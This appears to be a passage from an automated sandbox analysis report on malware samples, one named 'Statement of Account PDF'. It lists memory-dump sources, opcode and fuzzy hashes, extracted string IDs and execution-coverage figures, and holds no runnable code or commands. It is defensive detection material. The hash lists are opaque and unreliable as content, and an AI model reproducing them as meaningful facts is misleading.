                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4d7eb7d7cddc44bab6b29c9559cf9787a3aa885b7d3168f9fc693a27f39df01c
                                                        • Instruction ID: 94bc87c792b532acba344622edae824c6834f54d99be03b6dbcc33ba5599de95
                                                        • Opcode Fuzzy Hash: 4d7eb7d7cddc44bab6b29c9559cf9787a3aa885b7d3168f9fc693a27f39df01c
                                                        • Instruction Fuzzy Hash: 36210631B101199FCF94DB69E9506AEB7F6EF84310F618826D809EB754DB31ED418B80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7dbd1cd9a506a591b3e7c22f8a84d7625d7f5b610aab3c62344348f67de7e9a9
                                                        • Instruction ID: 36f827f8f4b8158dd13d4ec67b6d5aee36a12c2d547e9e5308da574ceca9c3fe
                                                        • Opcode Fuzzy Hash: 7dbd1cd9a506a591b3e7c22f8a84d7625d7f5b610aab3c62344348f67de7e9a9
                                                        • Instruction Fuzzy Hash: 11112630B10618ABEF24667C8C6072F658ED786760F31083AE84AD7B94C85ACC8147A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6f0dcb0e03278dc70fc781670e8f40fa81ccd5a8fd3246ae7e56333c9e67c42f
                                                        • Instruction ID: 8d58d2cabc89f0c92faab67829b8f58be6e489ae724150340827bca7d4e3b677
                                                        • Opcode Fuzzy Hash: 6f0dcb0e03278dc70fc781670e8f40fa81ccd5a8fd3246ae7e56333c9e67c42f
                                                        • Instruction Fuzzy Hash: 7011BE30E002288BCF54DF69D8805DEB7B6EB89340F1084A9D80AEB300EA36DE45CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fc9e21e1f4338a70297ae61ce9ae771322f681e7b9276a127e6a575ddbf71e58
                                                        • Instruction ID: 589fc668e56acf278a65f56e7a889b8c6c22c240faa218cd1383c6fbc4854629
                                                        • Opcode Fuzzy Hash: fc9e21e1f4338a70297ae61ce9ae771322f681e7b9276a127e6a575ddbf71e58
                                                        • Instruction Fuzzy Hash: 5601AC30B50618A7EF64666D8D6472F508ED7C5770F31483AE90ED7BD4C95ACC8507D2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 56d34ba4b69be86945e2f9c86f427eeff0f611e99f699fb1c95173495aa0e3d0
                                                        • Instruction ID: 3987e6cb9dfdffe77f8cb46b6f12f360d60b833bc1594abc61224e0f7508fc92
                                                        • Opcode Fuzzy Hash: 56d34ba4b69be86945e2f9c86f427eeff0f611e99f699fb1c95173495aa0e3d0
                                                        • Instruction Fuzzy Hash: 0011A136B101285FDF84D678C814AAF77EAABC8754B15843AD80AE7340EE69DC429BD1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2c61aef2e3ca0f03855347719648d70ffe22bd1691ccc5436e4fc6dc6254299c
                                                        • Instruction ID: 29e3098dca9e4ed495ecdac9b74a5778dd057b1bbcab79335bde146cf4d4a620
                                                        • Opcode Fuzzy Hash: 2c61aef2e3ca0f03855347719648d70ffe22bd1691ccc5436e4fc6dc6254299c
                                                        • Instruction Fuzzy Hash: 0E01D239B141204FDBA1D6AD9850B6AB7DEDFC9B00F25843AE54ACB745EA20DC428791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 04b31fffd73a1770b1f7e54b2dad7085523e0ea4929f91dd7cfb2295b813616b
                                                        • Instruction ID: 11c31862fa3dc06100eb8c580434671e863a65f60f0d082233411194763fc1ba
                                                        • Opcode Fuzzy Hash: 04b31fffd73a1770b1f7e54b2dad7085523e0ea4929f91dd7cfb2295b813616b
                                                        • Instruction Fuzzy Hash: B8012474B001104FCB26DB28D85072E77EADB89720F24882AE54ACB741EE21CC024B85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4072556508.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_fcd000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                        • Instruction ID: 526cc52ca7b52058fe8d342483763a789cf681d47745e91f623caa3e720f47a0
                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                        • Instruction Fuzzy Hash: 1B11BE75944244CFDB11CF14C6C4B1ABB61FB44324F28C6AED8494B656C33AD84ADB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4072556508.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_fcd000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                        • Instruction ID: 1a6c78f2c6f75ac73bfa7f84df4944b7c2b70b9648ec6e82ffc5ea46a1ba4fa6
                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                        • Instruction Fuzzy Hash: 9711D075904240CFCB05CF10D6C4B19BF62FB44324F24C6AED9494B256C33AE84ADB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4072556508.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_fcd000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4072556508.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_fcd000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4072389323.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_fbd000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4072389323.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_fbd000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 30e74ad349c8d91f78166d084fb66f54e1d8b248cf7298bee9160c616cc850c8
                                                        • Instruction ID: 34f27b9430cd7819272ca7f78914fee479b2e15317b8ce5816019116cc3e4373
                                                        • Opcode Fuzzy Hash: 30e74ad349c8d91f78166d084fb66f54e1d8b248cf7298bee9160c616cc850c8
                                                        • Instruction Fuzzy Hash: 9DE04F363042106FC3148A6EEC98D46FBE9EF89634B55806AF609C7761C931AC01C7A4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ef62a5773b66f5d32631520c2d317e137227a0ba9f564e39befaf82eb1dfbf61
                                                        • Instruction ID: 784146825250c5f457f5fcc54f53ea62386977fd6e5eb8b2f255fc0c1e7ccfe9
                                                        • Opcode Fuzzy Hash: ef62a5773b66f5d32631520c2d317e137227a0ba9f564e39befaf82eb1dfbf61
                                                        • Instruction Fuzzy Hash: 79E0D870E181889FDF91CFB49A9535A3B799B42208F3149E6C848CB293E175CA028391
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a4bf9e2c139efac2e0415e6a93131072d981b16a081d5e858653b0fa2ed5be73
                                                        • Instruction ID: 88104f38a95f8a46cb265b9e009f03c8e5c0adb4ff67217fabb4a8d14613ed29
                                                        • Opcode Fuzzy Hash: a4bf9e2c139efac2e0415e6a93131072d981b16a081d5e858653b0fa2ed5be73
                                                        • Instruction Fuzzy Hash: 99E08C363002106FC3148A0FEC88D06FBEDEFC8630B50802AFA09C7360CA30AC01CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7e6635e9219084152dc54f988b0aee8a40bd8e5e60c32845fed7e24525953578
                                                        • Instruction ID: c3c6045b1e0c8a9961430802c5c90784769daf75e5e65a7916eee5df069ea789
                                                        • Opcode Fuzzy Hash: 7e6635e9219084152dc54f988b0aee8a40bd8e5e60c32845fed7e24525953578
                                                        • Instruction Fuzzy Hash: 3FF0D4B091020ADFCB44EF79C514659BBF0BF49308F1189AED015E7262E7759610CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 352d4e2008c92ae84fde51fe48398ca9d3f89834aea1d97f1a769fb66f901f7c
                                                        • Instruction ID: 8caf1b40fdfcf8e01127663c6c3da19b522df7eca5d9b28b26d07a629909c13e
                                                        • Opcode Fuzzy Hash: 352d4e2008c92ae84fde51fe48398ca9d3f89834aea1d97f1a769fb66f901f7c
                                                        • Instruction Fuzzy Hash: 80E0C2B0E10108ABDF50CEB4D95575A77BDD701204F3185A4DC08C7611E172CA028380
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d5c31106e390d81d86a962560ef6a4cf26d0fe5045b47e3dcff49dc9196d2ef0
                                                        • Instruction ID: 8a6f072d29791a349bf5e7aae48749591f5214a7d838f8e9251c2bbc11d66ad8
                                                        • Opcode Fuzzy Hash: d5c31106e390d81d86a962560ef6a4cf26d0fe5045b47e3dcff49dc9196d2ef0
                                                        • Instruction Fuzzy Hash: DBE08C325483089FCB82DFB8D4508D13BF4FF3932070080AAE504CB462E2269926DB10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4078327794.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1300000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c804bd79a79115e9377354dc1530c84b0454aa0d174ce725863c6be1840db767
                                                        • Instruction ID: 9011dc5b1e7af29fdd564a235b03501f67cd71bfbe9e012af8c1f2644bbefb6e
                                                        • Opcode Fuzzy Hash: c804bd79a79115e9377354dc1530c84b0454aa0d174ce725863c6be1840db767
                                                        • Instruction Fuzzy Hash: A2E0B6B0D44209DFD744EFB9C915A5EBBF4BF08304F1185A9D019E7352EBB496048F91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-2222239885
                                                        • Opcode ID: 1b0a0f9c98baa532c801f818c4e8ebd05dcd001bcbdabd0b2557559c2466b1c2
                                                        • Instruction ID: 0509261006313a7a40a786badc9cc90fb5b89405e375a9b77cbbecfbe043b5e7
                                                        • Opcode Fuzzy Hash: 1b0a0f9c98baa532c801f818c4e8ebd05dcd001bcbdabd0b2557559c2466b1c2
                                                        • Instruction Fuzzy Hash: B0124D30E002198FDB68DFA5D954A9EB7F6BF84304F2185A9D409AF754DB309E85CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-3823777903
                                                        • Opcode ID: f4ea76059667c79aa8e0b66cfed59996c275be8d0268f532d1ffb9fe9a45232e
                                                        • Instruction ID: 4a86878e7db037cea6c300faf1cd9f71f849416d27a535178c6f825a75c392aa
                                                        • Opcode Fuzzy Hash: f4ea76059667c79aa8e0b66cfed59996c275be8d0268f532d1ffb9fe9a45232e
                                                        • Instruction Fuzzy Hash: C5919130E0020D9FEB64EF64DA54BAE77F6BF84310F218629E8019B758DB749C45CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-390881366
                                                        • Opcode ID: c3b0464ba6bdcb339693f16d64405b30707782a1348f30dbe5926d8a202e2c10
                                                        • Instruction ID: de44147db1fea5759dc9f44399deb3e31dd005f97588dea8eb5b1ac8b00971b6
                                                        • Opcode Fuzzy Hash: c3b0464ba6bdcb339693f16d64405b30707782a1348f30dbe5926d8a202e2c10
                                                        • Instruction Fuzzy Hash: 85F13C30B01209CFDB58EBA4D594AAEB7B6FF84300F218568D8459B75CDB35ED86CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q
                                                        • API String ID: 0-2125118731
                                                        • Opcode ID: ce410cc8e98aadab5e97643429f80d4f14e77b53da0424e1f6d9ddc1f20828c9
                                                        • Instruction ID: 4fe4fdd933293b242a3dda946318b000e5a8c29c950b5a26a12ee04a36e56b44
                                                        • Opcode Fuzzy Hash: ce410cc8e98aadab5e97643429f80d4f14e77b53da0424e1f6d9ddc1f20828c9
                                                        • Instruction Fuzzy Hash: 0AB16C30B102198FDB54EF69D694A9EB7B6FF84300F258869D806DB759DB35DC82CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LR^q$LR^q$$^q$$^q
                                                        • API String ID: 0-2454687669
                                                        • Opcode ID: e62ce898ee21218dad0e8e154234c5e25c34d6138ca20f7f886749b87c70b39e
                                                        • Instruction ID: 423a7c8e0f0f4ac093678f1e02392bdf17ad72dd756d6113be0deab52e824391
                                                        • Opcode Fuzzy Hash: e62ce898ee21218dad0e8e154234c5e25c34d6138ca20f7f886749b87c70b39e
                                                        • Instruction Fuzzy Hash: B8511730B002159FCB58EB29DA64A6E77F5FF84304F118968E812DB7A9DB30EC45CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q
                                                        • API String ID: 0-2125118731
                                                        • Opcode ID: 1bbf31ca59f75aafeb433ded2d38b08562fc00ba271d7769fa4af16c0164477d
                                                        • Instruction ID: 5a1091eea69abe178fbd100b28a52d884c5b9b5ff195a07a547ab8f0170dc1b3
                                                        • Opcode Fuzzy Hash: 1bbf31ca59f75aafeb433ded2d38b08562fc00ba271d7769fa4af16c0164477d
                                                        • Instruction Fuzzy Hash: 87518D30E102098FDF65EB64E5906ADB7B6FB84200F218A2AE845DB758DB34EC45CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:10.6%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:380
                                                        Total number of Limit Nodes:29

                                                        Control-flow Graph
                                                        control_flow_graph 294, first node 6a12368-6a139df (node and edge listing omitted)
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (bq$Hbq$Hbq$Hbq$Hbq$Hbq$Hbq$PH^q
                                                        • API String ID: 0-3076519024
                                                        • Opcode ID: 6949f7edbb5c40d84344f39b2c374909f40d930b1c89c8f855e7f36e186ea401
                                                        • Instruction ID: 883964d918cf2dc5f2ef03371898406780b64bede3c7d39a5ddcfa4f7244ea71
                                                        • Opcode Fuzzy Hash: 6949f7edbb5c40d84344f39b2c374909f40d930b1c89c8f855e7f36e186ea401
                                                        • Instruction Fuzzy Hash: 83728930B002148FCB54AF79C85466E7BA6AFC9310F248579D50ADF3A5CE35DD46CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph
                                                        control_flow_graph 574, first node 6a1a688-6a1a6a9 (node and edge listing omitted)
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: &IH3$4'^q$TJcq$Te^q$pbq$xbaq
                                                        • API String ID: 0-1216527603
